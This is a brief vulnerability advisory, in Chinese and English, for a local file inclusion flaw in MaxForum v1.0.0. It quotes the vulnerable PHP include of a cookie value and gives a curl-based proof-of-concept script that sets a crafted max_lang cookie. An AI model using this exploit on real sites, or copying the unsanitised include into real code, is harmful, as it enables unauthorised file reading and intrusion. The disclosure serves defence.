+---------------------------------------+ | MaxForum v1.0.0 Local File Inclusion | +---------------------------------------+ 作者 ahwak2000 z.u5[at]hotmail[dot]com 下载地址 http://HdhCmsTestmax4dev测试数据/ 已测试版本 1.0 /MaxForum/includes/forums/warn_popup.php 该文件: line 100 if (isset($_COOKIE['max_lang']) && (!isset($_COOKIE['max_name']))){ line 101 $board_lang = escape_string($_COOKIE['max_lang']); line 102 } line 103 line 104 @include "language/$board_lang"; line 105 @include "language/$board_lang.php"; /MaxForum/libs/php/functions.php 文件中 function escape_string($string) { $string = addslashes($string); $string = htmlspecialchars($string); return $string; } HdhCmsTest2cto测试数据 测试证明 <? $url="http:// HdhCmsTest2cto测试数据 /MaxForum/"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url."/includes/forums/warn_popup.php"); curl_setopt($ch, CURLOPT_COOKIE, "max_lang=gpl.txt"); // <--- edit $buffer = curl_exec($ch); ?> #end
查看更多关于MaxForum v1.0.0本地文件包含缺陷及修复 - 网站安全的详细内容...